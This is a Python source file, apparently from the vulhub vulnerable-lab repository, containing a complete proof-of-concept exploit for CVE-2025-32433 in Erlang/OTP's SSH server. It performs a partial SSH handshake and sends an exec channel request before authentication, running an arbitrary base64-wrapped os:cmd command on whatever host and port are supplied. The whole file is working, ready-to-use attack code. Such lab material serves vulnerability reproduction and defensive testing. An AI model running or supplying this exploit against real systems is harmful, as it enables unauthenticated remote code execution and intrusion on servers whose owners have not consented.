Files
vulhub/erlang/CVE-2025-32433/exploit.py
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

151 lines
5.1 KiB
Python

import socket
import struct
import time
import argparse
import base64
# Helper to format SSH string (4-byte length + bytes)
def string_payload(s):
s_bytes = s.encode("utf-8")
return struct.pack(">I", len(s_bytes)) + s_bytes
# Builds SSH_MSG_CHANNEL_OPEN for session
def build_channel_open(channel_id=0):
return (
b"\x5a" # SSH_MSG_CHANNEL_OPEN
+ string_payload("session")
+ struct.pack(">I", channel_id) # sender channel ID
+ struct.pack(">I", 0x68000) # initial window size
+ struct.pack(">I", 0x10000) # max packet size
)
# Builds SSH_MSG_CHANNEL_REQUEST with 'exec' payload
def build_channel_request(channel_id=0, command=None):
return (
b"\x62" # SSH_MSG_CHANNEL_REQUEST
+ struct.pack(">I", channel_id)
+ string_payload("exec")
+ b"\x01" # want_reply = true
+ string_payload(command)
)
# Builds a minimal but valid SSH_MSG_KEXINIT packet
def build_kexinit():
cookie = b"\x00" * 16
def name_list(l):
return string_payload(",".join(l))
# Match server-supported algorithms from the log
return (
b"\x14"
+ cookie
+ name_list(
[
"curve25519-sha256",
"ecdh-sha2-nistp256",
"diffie-hellman-group-exchange-sha256",
"diffie-hellman-group14-sha256",
]
) # kex algorithms
+ name_list(["rsa-sha2-256", "rsa-sha2-512"]) # host key algorithms
+ name_list(["aes128-ctr"]) * 2 # encryption client->server, server->client
+ name_list(["hmac-sha1"]) * 2 # MAC algorithms
+ name_list(["none"]) * 2 # compression
+ name_list([]) * 2 # languages
+ b"\x00"
+ struct.pack(">I", 0) # first_kex_packet_follows, reserved
)
# Pads a packet to match SSH framing
def pad_packet(payload, block_size=8):
min_padding = 4
padding_len = block_size - ((len(payload) + 5) % block_size)
if padding_len < min_padding:
padding_len += block_size
return (
struct.pack(">I", len(payload) + 1 + padding_len)
+ bytes([padding_len])
+ payload
+ bytes([0] * padding_len)
)
# Convert system command to Erlang os:cmd format
def format_erlang_command(cmd):
# Use base64 encoding to avoid escaping issues
encoded_cmd = base64.b64encode(cmd.encode()).decode()
# Create Erlang code that decodes and executes the command
return f'os:cmd(binary_to_list(base64:decode("{encoded_cmd}"))).'
# === Exploit flow ===
def main():
# Parse command line arguments
parser = argparse.ArgumentParser(description='Exploit for Erlang CVE-2025-32433')
parser.add_argument('-t', '--target', default="127.0.0.1", help='Target IP address (default: 127.0.0.1)')
parser.add_argument('-p', '--port', type=int, default=2222, help='Target port (default: 2222)')
parser.add_argument('-c', '--command', help='System command to execute (for example: touch /tmp/success)')
parser.add_argument('-e', '--erlang', help='Interpret command as raw Erlang code instead of system command. (for example: os:cmd("touch /tmp/success").)')
args = parser.parse_args()
# Convert system command to Erlang command unless --erlang flag is used
if args.erlang:
erlang_cmd = args.erlang
elif args.command:
erlang_cmd = format_erlang_command(args.command)
else:
print(parser.print_help())
return
try:
with socket.create_connection((args.target, args.port), timeout=5) as s:
print("[*] Connecting to SSH server...")
# 1. Banner exchange
s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
banner = s.recv(1024)
print(f"[+] Received banner: {banner.strip().decode(errors='ignore')}")
time.sleep(0.5) # Small delay between packets
# 2. Send SSH_MSG_KEXINIT
print("[*] Sending SSH_MSG_KEXINIT...")
kex_packet = build_kexinit()
s.sendall(pad_packet(kex_packet))
time.sleep(0.5) # Small delay between packets
# 3. Send SSH_MSG_CHANNEL_OPEN
print("[*] Sending SSH_MSG_CHANNEL_OPEN...")
chan_open = build_channel_open()
s.sendall(pad_packet(chan_open))
time.sleep(0.5) # Small delay between packets
# 4. Send SSH_MSG_CHANNEL_REQUEST (pre-auth!)
print("[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...")
print(f"[*] Erlang payload: {erlang_cmd}")
chan_req = build_channel_request(command=erlang_cmd)
s.sendall(pad_packet(chan_req))
print(
f"[✓] Exploit sent! Command executed on target"
)
# Try to receive any response (might get a protocol error or disconnect)
try:
response = s.recv(1024)
print(f"[+] Received response: {response.hex()}")
except socket.timeout:
print("[*] No response within timeout period (which is expected)")
except Exception as e:
print(f"[!] Error: {e}")
if __name__ == "__main__":
main()